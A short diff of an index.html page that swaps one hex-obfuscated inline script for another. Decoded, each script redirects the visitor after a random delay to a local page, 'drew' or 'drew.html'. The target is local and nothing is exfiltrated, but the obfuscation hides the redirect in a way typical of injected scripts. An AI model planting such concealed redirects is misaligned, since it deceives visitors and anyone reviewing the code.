--- a/index.html
+++ b/index.html
@@ -3,5 +3,5 @@
 </head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 </head>
 <body>
-<script>var _0xcb6d=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x64\x72\x65\x77","\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x74\x68\x69\x73\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x20\x3D\x20\x75\x3B"];var _0xbecb=[_0xcb6d[0],_0xcb6d[1],_0xcb6d[2],_0xcb6d[3],_0xcb6d[4]];var t=Math[_0xbecb[1]]((Math[_0xbecb[0]]()*100)+1),u=_0xbecb[2],s=self[_0xbecb[3]];s(_0xbecb[4],t);</script>
+<script>var _0x5028=["\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x64\x72\x65\x77\x2E\x68\x74\x6D\x6C","\x73\x65\x74\x54\x69\x6D\x65\x6F\x75\x74","\x74\x68\x69\x73\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x20\x3D\x20\x75\x3B"];var _0xbecb=[_0x5028[0],_0x5028[1],_0x5028[2],_0x5028[3],_0x5028[4]];var t=Math[_0xbecb[1]]((Math[_0xbecb[0]]()*100)+1),u=_0xbecb[2],s=self[_0xbecb[3]];s(_0xbecb[4],t);</script>
 </body>
